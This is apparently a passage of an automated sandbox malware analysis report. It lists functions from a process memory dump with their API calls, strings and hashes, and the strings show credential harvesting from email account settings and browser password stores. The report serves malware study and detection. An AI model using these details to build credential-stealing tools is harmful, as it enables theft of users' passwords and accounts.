                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                              • API String ID: 1348940319-1729847305
                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                              Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                              Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                              • strchr.MSVCRT ref: 0040371F
                                                              • _mbscpy.MSVCRT ref: 00403748
                                                              • _mbscpy.MSVCRT ref: 00403758
                                                              • strlen.MSVCRT ref: 00403778
                                                              • sprintf.MSVCRT ref: 0040379C
                                                              • _mbscpy.MSVCRT ref: 004037B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                              • String ID: %s@gmail.com
                                                              • API String ID: 500647785-4097000612
                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                              Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004094C8
                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                              • memset.MSVCRT ref: 0040950C
                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 3411445237-4169760276
                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                              Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                              • String ID:
                                                              • API String ID: 3642520215-0
                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                              Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                              • String ID:
                                                              • API String ID: 1999381814-0
                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                              Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                              • API String ID: 1297977491-3883738016
                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                              Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                              • memcpy.MSVCRT ref: 0044972E
                                                              • memcpy.MSVCRT ref: 0044977B
                                                              • memcpy.MSVCRT ref: 004497F6
                                                                • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                              • memcpy.MSVCRT ref: 00449846
                                                              • memcpy.MSVCRT ref: 00449887
                                                              • memcpy.MSVCRT ref: 004498B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                              Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm$__aullrem
                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                              • API String ID: 643879872-978417875
                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                              Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040810E
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                              • API String ID: 524865279-2190619648
                                                              • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                              • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                              Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                              • String ID: 0$6
                                                              • API String ID: 2300387033-3849865405
                                                              • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                              • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                              Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf
                                                              • String ID: %2.2X
                                                              • API String ID: 125969286-791839006
                                                              • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                              • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                              Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                              • String ID: ACD
                                                              • API String ID: 1886237854-620537770
                                                              • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                              • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                              Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004091EC
                                                              • sprintf.MSVCRT ref: 00409201
                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                              • String ID: caption$dialog_%d
                                                              • API String ID: 2923679083-4161923789
                                                              • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                              • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                              Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                              • memset.MSVCRT ref: 00410246
                                                              • memset.MSVCRT ref: 00410258
                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                              • memset.MSVCRT ref: 0041033F
                                                              • _mbscpy.MSVCRT ref: 00410364
                                                              • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 3974772901-0
                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                              Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0044406C
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                              • strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                              • memcpy.MSVCRT ref: 004440EB
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                              • String ID:
                                                              • API String ID: 577244452-0
                                                              • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                              • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                              Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                              • _strcmpi.MSVCRT ref: 00404518
                                                              • _strcmpi.MSVCRT ref: 00404536
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$memcpystrlen
                                                              • String ID: imap$pop3$smtp
                                                              • API String ID: 2025310588-821077329
                                                              • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                              • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                              Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C02D
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2726666094-3614832568
                                                              • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                              • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                              Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                              • String ID:
                                                              • API String ID: 2014771361-0
                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                              Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcmp.MSVCRT ref: 00406151
                                                                • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                              • memcmp.MSVCRT ref: 0040617C
                                                              • memcmp.MSVCRT ref: 004061A4
                                                              • memcpy.MSVCRT ref: 004061C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: global-salt$password-check
                                                              • API String ID: 231171946-3927197501
                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
